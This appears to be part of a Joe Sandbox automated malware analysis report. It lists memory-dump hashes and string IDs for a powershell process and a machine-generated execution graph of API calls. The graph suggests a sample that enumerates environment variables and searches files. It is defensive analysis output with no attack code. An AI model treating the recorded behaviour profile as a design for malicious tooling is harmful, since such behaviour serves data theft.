                    • Opcode Fuzzy Hash: 486a5ab62659c2b108d6b44dbdc67b8dbe4058ea53dd8cdf914b4c23d62c0873
                    • Instruction Fuzzy Hash: 8F6129F1604386DFEB258F69C85076ABBBAEF82210F2480E7E814CB355C735C845C752
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e0787ab7398c8e891edca58d35df010454bc6c1f1083cddac35e4a0802ee5b6a
                    • Instruction ID: 908d42a987e3c74a2edd1203a88297caf52817c57495922debc7c4c5be1e058b
                    • Opcode Fuzzy Hash: e0787ab7398c8e891edca58d35df010454bc6c1f1083cddac35e4a0802ee5b6a
                    • Instruction Fuzzy Hash: 9A716934A01205DFCB15DFA8D8849AEBBF2FF89314F1584AAE405AB262D735EC42CB50
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 988c501b08e9232df0eb47d52c7b55a608d97bcf967394976a396053d132119c
                    • Instruction ID: e9c341f2ac0b9d414dc3d9c3edcb1aab6e5cc9ea7d0fd17c2c8ccd79c48c2e2e
                    • Opcode Fuzzy Hash: 988c501b08e9232df0eb47d52c7b55a608d97bcf967394976a396053d132119c
                    • Instruction Fuzzy Hash: DC719C70A00209DFCB14DF68D894AAEBBF2FF85314F148969E4559B352DB75BC46CB80
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e3d036bee6baa41bce5ac3788eb24d7426300d7b93e64ec394b5e01f7e219cb3
                    • Instruction ID: d8279d5d322cf77c188c78164b73e567be581ed429940511d3849fdb0f36f9c5
                    • Opcode Fuzzy Hash: e3d036bee6baa41bce5ac3788eb24d7426300d7b93e64ec394b5e01f7e219cb3
                    • Instruction Fuzzy Hash: 03713C74A00209DFDB15DFB4D490BAEBBF2BF88308F148829D412AB261DB75BC46CB50
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1bc363499bc930e7fc2a0ec76b6af70b8a999fc2825ebd013e956886143af2ef
                    • Instruction ID: 74f37b5b14cd55bbb744ed74df56ff3ac98f78c5e9741048f2d4c14181c8e9f8
                    • Opcode Fuzzy Hash: 1bc363499bc930e7fc2a0ec76b6af70b8a999fc2825ebd013e956886143af2ef
                    • Instruction Fuzzy Hash: C34123F0B04202DFEB248F248594BBA77EAEF85340F1480E9D8459B355D736E948CB63
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3aa0147c8e200b649ce86078069f7dcf8c6b9757564dbabf72e3cf98b0211c8c
                    • Instruction ID: 693c4fb89330941294d0ba872fd6489d3383e5acacb5d826a5c34fda7beb90f5
                    • Opcode Fuzzy Hash: 3aa0147c8e200b649ce86078069f7dcf8c6b9757564dbabf72e3cf98b0211c8c
                    • Instruction Fuzzy Hash: 24511770A006099FDB19DFA4D8946AEBBF2FF89308F15982DD006AB291DB75AC45CB50
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f16fd8edabc76cca1d938921181a5bf87e6ba955840373320ad464071539ca07
                    • Instruction ID: 4cf997c782ea4ac7e1adde38aeab6e0402bfc3b48289363bb944d9fae95a9183
                    • Opcode Fuzzy Hash: f16fd8edabc76cca1d938921181a5bf87e6ba955840373320ad464071539ca07
                    • Instruction Fuzzy Hash: FF416AF27002919BFB159BB49411EAFBF96DFC2225B1480EAD5518F341DB318911C7A2
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e50fec9c9f54585c75284536e94e2c0ac5263203804b6af202f3048da611a8b9
                    • Instruction ID: 2e6e91d1930aac26f8651863aaaaf7c5057731ded5bd1ebd38876b06e0685265
                    • Opcode Fuzzy Hash: e50fec9c9f54585c75284536e94e2c0ac5263203804b6af202f3048da611a8b9
                    • Instruction Fuzzy Hash: CC41C279A097868FC702DB68D490B9ABFF0AF4A304F154186C884DB763D734EC15CB92
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b44023c469bcbcb69f5d8ffdbd0cee736005822c950330026ffdad0830ff87bd
                    • Instruction ID: 45226a181d084a57922f0fcf1ee4057070d164ac97b07a38e809b46a2492907f
                    • Opcode Fuzzy Hash: b44023c469bcbcb69f5d8ffdbd0cee736005822c950330026ffdad0830ff87bd
                    • Instruction Fuzzy Hash: 65311B34B001188FCB29DB74C8516EEBBB2BF89344F1454E9D509AB361DB35AE95CF81
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ab55e502ec2343cc2265236914507fa48a96cda7e88149229d3b91e350fec02d
                    • Instruction ID: 5a79a1f48cce3ba8a949ab6296067e534d57c3c047bad901313e9282d41c8aa0
                    • Opcode Fuzzy Hash: ab55e502ec2343cc2265236914507fa48a96cda7e88149229d3b91e350fec02d
                    • Instruction Fuzzy Hash: AA21F374A00609DFCB05CF99C5809AAFBB2FF89310B158599E909EB751C735FC51CBA0
                    Memory Dump Source
                    • Source File: 00000005.00000002.2514677282.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4ea0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a1e0cf4f0276fec935b852d7c1891e39b316aad6cf4cb661c6946f5cb6ac4668
                    • Instruction ID: b55da0ee6aba87fcbab1c6b02a933a6d3980a5b6e8acf8c693386f3e5c8a17f8
                    • Opcode Fuzzy Hash: a1e0cf4f0276fec935b852d7c1891e39b316aad6cf4cb661c6946f5cb6ac4668
                    • Instruction Fuzzy Hash: 95213AB4A04219DFCB10DF58D890AAEBBB0FF89300B15819AD949EB352D735FC51CBA1
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4eeeecc70c663cd62a5e9169aee3dffdbcfa26a0a8920bcf7aa9d925260bb5d5
                    • Instruction ID: 2d9d7f7d6b1e97e85c5ef87b2524a3bd5b891a10e2e48fb1dd4bdab7840dd44c
                    • Opcode Fuzzy Hash: 4eeeecc70c663cd62a5e9169aee3dffdbcfa26a0a8920bcf7aa9d925260bb5d5
                    • Instruction Fuzzy Hash: C2F046B710C1C94BE7038AA8A860AA2FF64AF93230728C2DBD0954F393E6314016DB41
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff21634bc8f69f17d23d2bd5b130c70267294e37396f98701cdf0742afa6edd9
                    • Instruction ID: e819a17d09907fb79c6f4b388a729303fb137a370d58c353d58a5d5b3bad037b
                    • Opcode Fuzzy Hash: ff21634bc8f69f17d23d2bd5b130c70267294e37396f98701cdf0742afa6edd9
                    • Instruction Fuzzy Hash: 32E086F5200147CBFB10CA04C844A15F365FBC0219F2CC0EAA0190F2A5C736D442C715
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl$(fbl$(fbl$(fbl$(fbl
                    • API String ID: 0-3384489963
                    • Opcode ID: dee9a00b33eb70fab86891e2f0d7a9066bce8df71d1994879f3cd206dab18a0e
                    • Instruction ID: 46ecbc704a5de0f9e71475a93e29f796d43a59ba3707eb43d9aafa8a4eb4031e
                    • Opcode Fuzzy Hash: dee9a00b33eb70fab86891e2f0d7a9066bce8df71d1994879f3cd206dab18a0e
                    • Instruction Fuzzy Hash: E0C16CF0E00205DBEB248FA8C851A6AB7F6EF85314F1485A9D9169BB44DF36EC41CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 84`l$84`l$84`l$84`l
                    • API String ID: 0-2043871387
                    • Opcode ID: f6252504e7a608433344949411a02f112b985784c16d0e8b7ba52d9f20cadac0
                    • Instruction ID: c987145c95945eaebd3fc8243b481201108ab797d1dd3b0d3715ca77f23c1649
                    • Opcode Fuzzy Hash: f6252504e7a608433344949411a02f112b985784c16d0e8b7ba52d9f20cadac0
                    • Instruction Fuzzy Hash: 93E190B1B00219DFEB28DF58C454AAEBBB6FF89310F2480A5E9059B355CBB1DC41CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$x.Sk$-Sk
                    • API String ID: 0-247111407
                    • Opcode ID: ce68b878b3978f088ef5c93677b105eabf153cbf3129929d73f5414939331a74
                    • Instruction ID: 5d03e0212af70d9c1f80639584556c96a0fc69432702c3bf7443d6baaa726470
                    • Opcode Fuzzy Hash: ce68b878b3978f088ef5c93677b105eabf153cbf3129929d73f5414939331a74
                    • Instruction Fuzzy Hash: 60C179B1A00205DFEB24CF54D851BAEB7F6EF89704F148469D9152B754CB36E842CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl
                    • API String ID: 0-3980633156
                    • Opcode ID: 98c6d0c823a8634188225a117352fe562a7cdedc2458294238616e67823827a9
                    • Instruction ID: c2b25e279cf11436e3a4dd6faac53a503647b3f79d374c6990e079875d8fe205
                    • Opcode Fuzzy Hash: 98c6d0c823a8634188225a117352fe562a7cdedc2458294238616e67823827a9
                    • Instruction Fuzzy Hash: DBA16AF1E01202DFEB20CF95C851AAAB7F6EF85314F1885AAD8556B714DB32A841CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.2521012199.0000000007BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07BE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_7be0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: (fbl$(fbl$(fbl$(fbl
                    • API String ID: 0-3980633156
                    • Opcode ID: a05a293e5d496334cf7271d590170dddc8bb289c99ae2b90ddfbd69638635ff1
                    • Instruction ID: d3d2f0b2e67cfcc4ba3c882d6681607062d42a39b2ac8671df3adf62d569980d
                    • Opcode Fuzzy Hash: a05a293e5d496334cf7271d590170dddc8bb289c99ae2b90ddfbd69638635ff1
                    • Instruction Fuzzy Hash: 3E715FB0A00205EFEB14CF58C455AAEB7F6EF89310F1481A9D815AB755CB36EC45CF92

                    Execution Graph

                    Execution Coverage:3.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:2.8%
                    Total number of Nodes:1570
                    Total number of Limit Nodes:11
                    execution_graph (the interactive node/edge rendering is not reproduced; the entry points recovered from it, all in the 2136xxxx range, and the Windows API calls each one reaches are listed below; the listing breaks off on the page after the last entry)
                    • 21361f3f (CRT start-up: ___scrt_is_nonwritable_in_current_image, __RTC_Initialize, ___scrt_initialize_default_local_stdio_options): IsProcessorFeaturePresent, RtlInitializeSListHead, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, GetProcAddress, GetLastError, FreeLibrary, TlsAlloc, TlsSetValue, TlsFree, GetStdHandle, GetFileType, GetCurrentProcess, TerminateProcess, RtlDeleteCriticalSection
                    • 213621a1: ___scrt_dllmain_exception_filter (no API calls)
                    • 21363370: _ValidateLocalCookies (node summarized as 5 API calls)
                    • 21363eb3, 2136543d: _abort (nodes summarized as 38 API calls)
                    • 213663f0: _free, _abort, ___scrt_fastfail, FindFirstFileExA
                    • 21364ed7: GetEnvironmentStringsW (plus a node summarized as 51 API calls; the listing is cut off here)
                    • 2136506f: node summarized as 20 API calls
                    • 21365630: RtlDeleteCriticalSection (plus a node summarized as 11 API calls)
                    • 21365bff: TlsAlloc, TlsFree
                    • 213660ac: FreeLibrary
                    • 213667bf: _free, _abort, ___scrt_fastfail, RtlSizeHeap, RtlReAllocateHeap, RtlAllocateHeap
                    • 2136742b: RtlDeleteCriticalSection
                    • 213681a0: _free, _abort, _ValidateLocalCookies (summarized nodes only)
                    • 21369db8: node summarized as 21 API calls
                    • 21369e71, 2136ac6b: __startOneArgErrorHandling, RaiseException (via __raise_exc; further nodes summarized as 5, 20 and 21 API calls)
                    • 2136a1e0: RtlDecodePointer
                    • 2136c7a7: GetModuleHandleA, GetProcAddress, VirtualProtect, VirtualProtect
213671bd 7714->7725 7716 21367170 WideCharToMultiByte 7715->7716 7719 2136718c 7716->7719 7716->7725 7717 213671c6 FreeEnvironmentStringsW 7718 21364eee 7717->7718 7718->7713 7726 21364f2f 7718->7726 7720 213656d0 21 API calls 7719->7720 7721 21367192 7720->7721 7722 21367199 WideCharToMultiByte 7721->7722 7723 213671af 7721->7723 7722->7723 7724 2136571e _free 20 API calls 7723->7724 7724->7725 7725->7717 7725->7718 7727 21364f44 7726->7727 7728 2136637b _abort 20 API calls 7727->7728 7737 21364f6b 7728->7737 7729 21364fcf 7730 2136571e _free 20 API calls 7729->7730 7731 21364fe9 7730->7731 7731->7712 7732 2136637b _abort 20 API calls 7732->7737 7733 21364fd1 7734 21365000 20 API calls 7733->7734 7736 21364fd7 7734->7736 7735 2136544d ___std_exception_copy 26 API calls 7735->7737 7739 2136571e _free 20 API calls 7736->7739 7737->7729 7737->7732 7737->7733 7737->7735 7738 21364ff3 7737->7738 7741 2136571e _free 20 API calls 7737->7741 7740 213662bc _abort 11 API calls 7738->7740 7739->7729 7742 21364fff 7740->7742 7741->7737 7130 213673d5 7131 213673e1 ___scrt_is_nonwritable_in_current_image 7130->7131 7142 21365671 RtlEnterCriticalSection 7131->7142 7133 213673e8 7143 21368be3 7133->7143 7135 213673f7 7141 21367406 7135->7141 7156 21367269 GetStartupInfoW 7135->7156 7138 21367417 _abort 7140 2136731f 2 API calls 7140->7141 7162 21367422 7141->7162 7142->7133 7144 21368bef ___scrt_is_nonwritable_in_current_image 7143->7144 7145 21368c13 7144->7145 7146 21368bfc 7144->7146 7165 21365671 RtlEnterCriticalSection 7145->7165 7148 21366368 _free 20 API calls 7146->7148 7149 21368c01 7148->7149 7150 213662ac _abort 26 API calls 7149->7150 7151 21368c0b _abort 7150->7151 7151->7135 7152 21368c4b 7173 21368c72 7152->7173 7153 21368c1f 7153->7152 7166 21368b34 7153->7166 7157 21367286 7156->7157 7158 21367318 7156->7158 7157->7158 7159 21368be3 27 API calls 7157->7159 7158->7140 7160 213672af 7159->7160 7160->7158 7161 213672dd GetFileType 7160->7161 7161->7160 7184 213656b9 
RtlLeaveCriticalSection 7162->7184 7164 21367429 7164->7138 7165->7153 7167 2136637b _abort 20 API calls 7166->7167 7168 21368b46 7167->7168 7172 21368b53 7168->7172 7176 21365eb7 7168->7176 7169 2136571e _free 20 API calls 7171 21368ba5 7169->7171 7171->7153 7172->7169 7183 213656b9 RtlLeaveCriticalSection 7173->7183 7175 21368c79 7175->7151 7177 21365c45 _abort 5 API calls 7176->7177 7178 21365ede 7177->7178 7179 21365efc InitializeCriticalSectionAndSpinCount 7178->7179 7180 21365ee7 7178->7180 7179->7180 7181 21362ada _ValidateLocalCookies 5 API calls 7180->7181 7182 21365f13 7181->7182 7182->7168 7183->7175 7184->7164 7679 21363c90 RtlUnwind 7743 213636d0 7744 213636e2 7743->7744 7746 213636f0 @_EH4_CallFilterFunc@8 7743->7746 7745 21362ada _ValidateLocalCookies 5 API calls 7744->7745 7745->7746 6458 21365351 6459 21365360 6458->6459 6460 21365374 6458->6460 6459->6460 6462 2136571e _free 20 API calls 6459->6462 6461 2136571e _free 20 API calls 6460->6461 6463 21365386 6461->6463 6462->6460 6464 2136571e _free 20 API calls 6463->6464 6465 21365399 6464->6465 6466 2136571e _free 20 API calls 6465->6466 6467 213653aa 6466->6467 6468 2136571e _free 20 API calls 6467->6468 6469 213653bb 6468->6469 7441 2136281c 7444 21362882 7441->7444 7447 21363550 7444->7447 7446 2136282a 7448 2136355d 7447->7448 7452 2136358a 7447->7452 7449 213647e5 ___std_exception_copy 21 API calls 7448->7449 7448->7452 7450 2136357a 7449->7450 7450->7452 7453 2136544d 7450->7453 7452->7446 7454 2136545a 7453->7454 7455 21365468 7453->7455 7454->7455 7458 2136547f 7454->7458 7456 21366368 _free 20 API calls 7455->7456 7461 21365470 7456->7461 7457 213662ac _abort 26 API calls 7459 2136547a 7457->7459 7458->7459 7460 21366368 _free 20 API calls 7458->7460 7459->7452 7460->7461 7461->7457 7185 21364bdd 7186 21364bec 7185->7186 7187 21364c08 7185->7187 7186->7187 7188 21364bf2 7186->7188 7208 21366d60 7187->7208 7190 21366368 _free 20 API calls 7188->7190 7192 21364bf7 7190->7192 7194 213662ac 
_abort 26 API calls 7192->7194 7193 21364c33 7212 21364d01 7193->7212 7195 21364c01 7194->7195 7198 21364e76 20 API calls 7199 21364c5d 7198->7199 7200 21364c66 7199->7200 7201 21364c72 7199->7201 7202 21366368 _free 20 API calls 7200->7202 7203 21364d01 38 API calls 7201->7203 7207 21364c6b 7202->7207 7205 21364c88 7203->7205 7204 2136571e _free 20 API calls 7204->7195 7206 2136571e _free 20 API calls 7205->7206 7205->7207 7206->7207 7207->7204 7209 21364c0f GetModuleFileNameA 7208->7209 7210 21366d69 7208->7210 7209->7193 7218 21366c5f 7210->7218 7214 21364d26 7212->7214 7216 21364d86 7214->7216 7393 213670eb 7214->7393 7215 21364c50 7215->7198 7216->7215 7217 213670eb 38 API calls 7216->7217 7217->7216 7219 21365af6 _abort 38 API calls 7218->7219 7220 21366c6c 7219->7220 7238 21366d7e 7220->7238 7222 21366c74 7247 213669f3 7222->7247 7225 21366c8b 7225->7209 7226 213656d0 21 API calls 7227 21366c9c 7226->7227 7228 21366cce 7227->7228 7254 21366e20 7227->7254 7231 2136571e _free 20 API calls 7228->7231 7231->7225 7232 21366cc9 7233 21366368 _free 20 API calls 7232->7233 7233->7228 7234 21366d12 7234->7228 7264 213668c9 7234->7264 7235 21366ce6 7235->7234 7236 2136571e _free 20 API calls 7235->7236 7236->7234 7239 21366d8a ___scrt_is_nonwritable_in_current_image 7238->7239 7240 21365af6 _abort 38 API calls 7239->7240 7245 21366d94 7240->7245 7242 21366e18 _abort 7242->7222 7244 213655a8 _abort 38 API calls 7244->7245 7245->7242 7245->7244 7246 2136571e _free 20 API calls 7245->7246 7267 21365671 RtlEnterCriticalSection 7245->7267 7268 21366e0f 7245->7268 7246->7245 7272 213654a7 7247->7272 7250 21366a26 7252 21366a2b GetACP 7250->7252 7253 21366a3d 7250->7253 7251 21366a14 GetOEMCP 7251->7253 7252->7253 7253->7225 7253->7226 7255 213669f3 40 API calls 7254->7255 7256 21366e3f 7255->7256 7259 21366e90 IsValidCodePage 7256->7259 7261 21366e46 7256->7261 7263 21366eb5 ___scrt_fastfail 7256->7263 7257 21362ada _ValidateLocalCookies 5 API calls 7258 21366cc1 7257->7258 
7258->7232 7258->7235 7260 21366ea2 GetCPInfo 7259->7260 7259->7261 7260->7261 7260->7263 7261->7257 7284 21366acb GetCPInfo 7263->7284 7357 21366886 7264->7357 7266 213668ed 7266->7228 7267->7245 7271 213656b9 RtlLeaveCriticalSection 7268->7271 7270 21366e16 7270->7245 7271->7270 7273 213654c4 7272->7273 7274 213654ba 7272->7274 7273->7274 7275 21365af6 _abort 38 API calls 7273->7275 7274->7250 7274->7251 7276 213654e5 7275->7276 7277 21367a00 __fassign 38 API calls 7276->7277 7278 213654fe 7277->7278 7280 21367a2d 7278->7280 7281 21367a55 7280->7281 7282 21367a40 7280->7282 7281->7274 7282->7281 7283 21366d7e __fassign 38 API calls 7282->7283 7283->7281 7285 21366b05 7284->7285 7286 21366baf 7284->7286 7294 213686e4 7285->7294 7289 21362ada _ValidateLocalCookies 5 API calls 7286->7289 7291 21366c5b 7289->7291 7291->7261 7293 21368a3e 43 API calls 7293->7286 7295 213654a7 __fassign 38 API calls 7294->7295 7296 21368704 MultiByteToWideChar 7295->7296 7298 213687da 7296->7298 7299 21368742 7296->7299 7300 21362ada _ValidateLocalCookies 5 API calls 7298->7300 7301 213656d0 21 API calls 7299->7301 7305 21368763 ___scrt_fastfail 7299->7305 7302 21366b66 7300->7302 7301->7305 7308 21368a3e 7302->7308 7303 213687d4 7313 21368801 7303->7313 7305->7303 7306 213687a8 MultiByteToWideChar 7305->7306 7306->7303 7307 213687c4 GetStringTypeW 7306->7307 7307->7303 7309 213654a7 __fassign 38 API calls 7308->7309 7310 21368a51 7309->7310 7317 21368821 7310->7317 7314 2136881e 7313->7314 7315 2136880d 7313->7315 7314->7298 7315->7314 7316 2136571e _free 20 API calls 7315->7316 7316->7314 7318 2136883c 7317->7318 7319 21368862 MultiByteToWideChar 7318->7319 7323 2136888c 7319->7323 7331 21368a16 7319->7331 7320 21362ada _ValidateLocalCookies 5 API calls 7321 21366b87 7320->7321 7321->7293 7322 213688ad 7325 213688f6 MultiByteToWideChar 7322->7325 7326 21368962 7322->7326 7323->7322 7324 213656d0 21 API calls 7323->7324 7324->7322 7325->7326 7327 2136890f 7325->7327 7329 21368801 
__freea 20 API calls 7326->7329 7344 21365f19 7327->7344 7329->7331 7331->7320 7332 21368971 7336 213656d0 21 API calls 7332->7336 7339 21368992 7332->7339 7333 21368939 7333->7326 7334 21365f19 11 API calls 7333->7334 7334->7326 7335 21368a07 7338 21368801 __freea 20 API calls 7335->7338 7336->7339 7337 21365f19 11 API calls 7340 213689e6 7337->7340 7338->7326 7339->7335 7339->7337 7340->7335 7341 213689f5 WideCharToMultiByte 7340->7341 7341->7335 7342 21368a35 7341->7342 7343 21368801 __freea 20 API calls 7342->7343 7343->7326 7345 21365c45 _abort 5 API calls 7344->7345 7346 21365f40 7345->7346 7347 21365f49 7346->7347 7352 21365fa1 7346->7352 7350 21362ada _ValidateLocalCookies 5 API calls 7347->7350 7351 21365f9b 7350->7351 7351->7326 7351->7332 7351->7333 7353 21365c45 _abort 5 API calls 7352->7353 7354 21365fc8 7353->7354 7355 21362ada _ValidateLocalCookies 5 API calls 7354->7355 7356 21365f89 LCMapStringW 7355->7356 7356->7347 7358 21366892 ___scrt_is_nonwritable_in_current_image 7357->7358 7365 21365671 RtlEnterCriticalSection 7358->7365 7360 2136689c 7366 213668f1 7360->7366 7364 213668b5 _abort 7364->7266 7365->7360 7378 21367011 7366->7378 7368 2136693f 7369 21367011 26 API calls 7368->7369 7370 2136695b 7369->7370 7371 21367011 26 API calls 7370->7371 7372 21366979 7371->7372 7373 213668a9 7372->7373 7374 2136571e _free 20 API calls 7372->7374 7375 213668bd 7373->7375 7374->7373 7392 213656b9 RtlLeaveCriticalSection 7375->7392 7377 213668c7 7377->7364 7379 21367022 7378->7379 7388 2136701e 7378->7388 7380 21367029 7379->7380 7384 2136703c ___scrt_fastfail 7379->7384 7381 21366368 _free 20 API calls 7380->7381 7382 2136702e 7381->7382 7383 213662ac _abort 26 API calls 7382->7383 7383->7388 7385 21367073 7384->7385 7386 2136706a 7384->7386 7384->7388 7385->7388 7389 21366368 _free 20 API calls 7385->7389 7387 21366368 _free 20 API calls 7386->7387 7390 2136706f 7387->7390 7388->7368 7389->7390 7391 213662ac _abort 26 API calls 7390->7391 7391->7388 
7392->7377 7396 21367092 7393->7396 7397 213654a7 __fassign 38 API calls 7396->7397 7398 213670a6 7397->7398 7398->7214 7680 21364a9a 7681 21365411 38 API calls 7680->7681 7682 21364aa2 7681->7682 6027 21361c5b 6028 21361c6b ___scrt_fastfail 6027->6028 6031 213612ee 6028->6031 6030 21361c87 6032 21361324 ___scrt_fastfail 6031->6032 6033 213613b7 GetEnvironmentVariableW 6032->6033 6057 213610f1 6033->6057 6036 213610f1 57 API calls 6037 21361465 6036->6037 6038 213610f1 57 API calls 6037->6038 6039 21361479 6038->6039 6040 213610f1 57 API calls 6039->6040 6041 2136148d 6040->6041 6042 213610f1 57 API calls 6041->6042 6043 213614a1 6042->6043 6044 213610f1 57 API calls 6043->6044 6045 213614b5 lstrlenW 6044->6045 6046 213614d2 6045->6046 6047 213614d9 lstrlenW 6045->6047 6046->6030 6048 213610f1 57 API calls 6047->6048 6049 21361501 lstrlenW lstrcatW 6048->6049 6050 213610f1 57 API calls 6049->6050 6051 21361539 lstrlenW lstrcatW 6050->6051 6052 213610f1 57 API calls 6051->6052 6053 2136156b lstrlenW lstrcatW 6052->6053 6054 213610f1 57 API calls 6053->6054 6055 2136159d lstrlenW lstrcatW 6054->6055 6056 213610f1 57 API calls 6055->6056 6056->6046 6058 21361118 ___scrt_fastfail 6057->6058 6059 21361129 lstrlenW 6058->6059 6070 21362c40 6059->6070 6062 21361177 lstrlenW FindFirstFileW 6064 213611a0 6062->6064 6065 213611e1 6062->6065 6063 21361168 lstrlenW 6063->6062 6066 213611c7 FindNextFileW 6064->6066 6067 213611aa 6064->6067 6065->6036 6066->6064 6069 213611da FindClose 6066->6069 6067->6066 6072 21361000 6067->6072 6069->6065 6071 21361148 lstrcatW lstrlenW 6070->6071 6071->6062 6071->6063 6073 21361022 ___scrt_fastfail 6072->6073 6074 213610af 6073->6074 6075 2136102f lstrcatW lstrlenW 6073->6075 6078 213610b5 lstrlenW 6074->6078 6079 213610ad 6074->6079 6076 2136105a lstrlenW 6075->6076 6077 2136106b lstrlenW 6075->6077 6076->6077 6089 21361e89 lstrlenW 6077->6089 6103 21361e16 6078->6103 6079->6067 6082 21361088 GetFileAttributesW 6082->6079 6084 2136109c 
